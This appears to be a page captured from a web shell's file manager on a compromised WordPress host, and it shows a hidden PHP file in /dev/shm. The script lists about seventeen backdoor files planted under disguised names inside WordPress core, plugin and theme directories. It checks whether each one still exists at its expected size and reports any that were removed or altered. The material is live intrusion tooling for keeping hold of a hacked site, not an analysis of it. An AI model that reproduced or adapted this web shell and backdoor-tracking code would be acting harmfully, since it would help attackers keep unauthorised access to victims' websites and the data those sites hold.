D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
thread-self
/
root
/
dev
/
shm
/
Filename :
.comp
back
Copy
<?php $r = '/home/ukqcurpj/public_html'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@1016935@@99", "/website/wp-content/plugins/wp-simple-pay-pro-3/includes/core/admin/notices/promos/general/sidebar.tab.box.header.php"=>"bd@@1011054@@907", "/website/wp-content/plugins/updraftplus/vendor/aws/aws-sdk-php/src/Aws/Common/Command/_mailform.php"=>"bd@@1010041@@869", "/wp-content/themes/custom-functions-1759184744/styIe.php"=>"bd@@1007491@@1126", "/website/wp-content/plugins/buddypress/bp-templates/bp-nouveau/buddypress/members/single/notifications/notifications.loop.php"=>"bd@@1010640@@922", "/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Profiler/Node/phpbb22.inc.php"=>"bd@@1010395@@812", "/website/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-crud-controller.php"=>"bd@@1017714@@79", "/website/wp-content/plugins/masterstudy-lms-learning-management-system-pro/stm-lms-templates/manage_course/forms/js/date.php"=>"bd@@1017908@@10", "/wp-content/_plugins/woocommerce/includes/wccom-site/installation/installation-steps/class-wc-wccom-site-installation-step-get-product-info.php"=>"bd@@1018580@@29", "/website/wp-admin/user-new.php"=>"bd@@1018890@@98", "/wp-content/_plugins/masterstudy-lms-learning-management-system/_core/stm-lms-templates/account/float_menu/menu_items/dropdown_menu_item.php"=>"bd@@1022463@@15", "/website/wp-content/plugins/elementor/core/app/modules/kit-library/data/kits/endpoints/download.php"=>"bd@@1023253@@1046", "/website/wp-content/plugins/updraftplus/vendor/kriswallsmith/assetic/src/Assetic/Factory/config_locale.php"=>"bd@@1023591@@938", "/website/wp-content/plugins/updraftplus/vendor/guzzle/guzzle/src/Guzzle/Common/removed_emails.php"=>"bd@@1023788@@952", "/website/wp-content/plugins/updraftplus/vendor/aws/aws-sdk-php/src/Aws/Common/language.lib.php"=>"bd@@1023907@@1031", "/website/wp-content/plugins/updraftplus/vendor/kriswallsmith/assetic/src/Assetic/Filter/Sass/searchtypes.php"=>"bd@@1009617@@1000", "/website/wp-content/plugins/paid-memberships-pro/includes/lib/Braintree/lib/Braintree/Error/sched_defenses.php"=>"bd@@1023985@@967"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');